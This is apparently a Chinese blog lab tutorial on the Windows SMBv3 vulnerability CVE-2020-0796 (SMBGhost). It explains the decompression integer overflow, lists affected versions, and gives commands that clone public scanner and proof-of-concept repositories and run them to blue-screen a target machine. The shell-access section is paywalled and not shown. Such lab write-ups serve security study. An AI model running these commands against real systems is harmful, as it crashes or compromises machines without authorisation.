环境准备:win10(驱动版本10.0.18362.1)靶机、kali攻击机
漏洞介绍:
2020年3月,微软公布SMB远程代码执行漏洞(CVE-2020-0796)又称“永恒之黑”,该漏洞由SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。
漏洞原理:
SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。
Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法,最终导致整数溢出。
利用该漏洞,黑客可直接远程攻击SMB服务端远程执行任意恶意代码,亦可通过构建恶意SMB服务端诱导客户端连接从而大规模攻击客户端。
影响版本:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server,Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server,Version 1909(Server Core installation)
目录
一、蓝屏攻击
🌂下载工具
git clone https://github.com/ollypwn/SMBGhost.git
🌂进入工具目录下,进行扫描,出现下图字样即为存在漏洞
python3 scanner.py 靶机ip

🌂下载工具,进入目录,对靶机进行攻击
git clone https://github.com/eerykitty/CVE-2020-0796-PoC.git
python3 CVE-2020-0796.py 靶机ip

PS:缺少ntlm_auth模块,使用python3 -m pip install ntlm_auth,进行下载后再执行
🌂查看靶机,蓝屏

本文详细描述了Windows10上的SMB远程代码执行漏洞(CVE-2020-0796)利用方法,涉及SMBGhost工具的扫描和攻击,以及getshell过程,包括蓝屏攻击和通过Meterpreter获取shell的步骤。
最低0.47元/天 解锁文章
5568

被折叠的 条评论
为什么被折叠?



